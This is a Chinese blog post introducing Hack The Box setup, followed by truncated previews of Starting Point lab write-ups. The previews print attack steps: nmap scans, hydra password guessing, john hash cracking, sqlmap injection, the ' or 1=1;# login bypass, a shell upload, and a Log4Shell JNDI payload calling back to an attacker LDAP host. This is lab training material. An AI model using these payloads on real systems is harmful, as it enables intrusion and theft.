Hack The Box 初次使用
登陆后, 点击右侧的 Lab --> STARTING POINT
点击第一个
使用openvpn配置文件进行连接
下载配置文件
使用配置文件
下载openvpn 客户端 https://openvpn.net/
使用:
openvpn xxx.ovpn |
使用: 安装以后导入下载的配置文件,然后点击连接
开启靶场虚拟机 左上角点击 Start point 可以查看当前连接情况, 当连接以后,就可以开启靶场了
点击 spawn machine 开机
稍等片刻出现IP地址就可以了进行测试了, 后面分别时重启和关机
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Hao DevSecOps!
微信
相关推荐
2023-02-28
Hack The Box :: Starting Point - Redeemer
Which TCP port is open on the machine? 6379 扫描 map -p- --min-rate 5000 -sV 10.129.241.156 --open Which service is running on the port that is open on the machine? redis What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database In-memory Database Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments. redis-cli Which flag is used wi...
2023-02-28
Hack The Box :: Starting Point - Sequel
扫描, 发现3306端口开放nmap -A 10.129.95.232 弱密码,密码为空,如果破解其他密码可以把 -e nsr 换成字典路径即可ydra -l root -e nsr mysql://10.129.95.232 登录mysqlmysql -uroot -h 10.129.95.232 show databases; #列数据库 use htb; #切换数据库 show tables; # 列表 select * from config; #获取表中数据 Task 1 During our scan, which port do we find serving MySQL? 3306 Task 2 What community-developed MySQL version is the target running? MariaDB Task 3 When using the MySQL command line client, what...
2023-03-02
Hack The Box :: Starting Point - Vaccine
老规矩,扫描nmap -A 10.129.89.216 -v --open ftp匿名登录,有个backup.zip文件, 下载下来看下 backup.zip文件需要密码, 使用john进行破解,获取到密码 741852963zip2john backup.zip > hashjohn --wordlist=/usr/share/wordlists/rockyou.txt hashjohn --show hash 解压后, 查看index.php发现登录是进行hash对比, hash值是cmd5加密,解密后得到 qwerty789cat index.php https://www.somd5.com/ 用上面的信息访问下我们的网站 adminqwerty789 登录 搜索框有个搜索, 尝试用sqlmap跑下看看有没有注入, 同时需要带上phpsession的cookiesqlmap -url "http://10.129.89.216/dashboard.php?search=1" --cookie="PHPSESSID=2d...
2023-02-28
Hack The Box :: Starting Point - Appointment
端口扫描nmap -sV 10.129.24.207 页面为登录页面,根据提示为SQL注入,尝试用 ‘ or 1=1;# 测试admin1' or 1=1;# Task 1 What does the acronym SQL stand for? Structured Query Language Task 2 What is one of the most common type of SQL vulnerabilities? sql injection Task 3 What does PII stand for? personally identifiable information Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability? A03:2021-Injection Task 5 What does Nmap report as the service and version that are running on port...
2023-03-01
Hack The Box :: Starting Point - Three
扫描nmap -T4 -Pn -sVC -p- 10.129.27.183 开放端口22, 80 访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb 根据提示写入域名到hosts,然后爆破子域名echo "10.129.27.183 thetoppers.htb" >> /etc/hostsgobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts 一开始题目提示是 s3.thetoppers.htb 安装AWS客户端apt install awscli -yaws configure # 配置 上传shellaws --endpoint=http://s3.thetop...
2023-03-02
Hack The Box :: Starting Point - Unified
扫描, 开放端口,22,6789,8443,8080nmap -A 10.129.56.105 --open 访问https://10.129.56.105:8443 经过搜索发现漏洞为 cve-2021-44228https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi 登录 抓包 把post的包发到Repeater,tcpdump监听网卡389端口,ldap默认389, 然后改包,发送, 可以看到收到一个发往端口389的数据包 "remember":false,#改为 ${jndi:ldap://本地IP地址}"remember":"${jndi:ldap://10.10.16.130/o=tomcat}", 部署一个jndi#安装编译环境并拉取项目编译apt install maven -ygit clone https://github.com/veracod...
评论
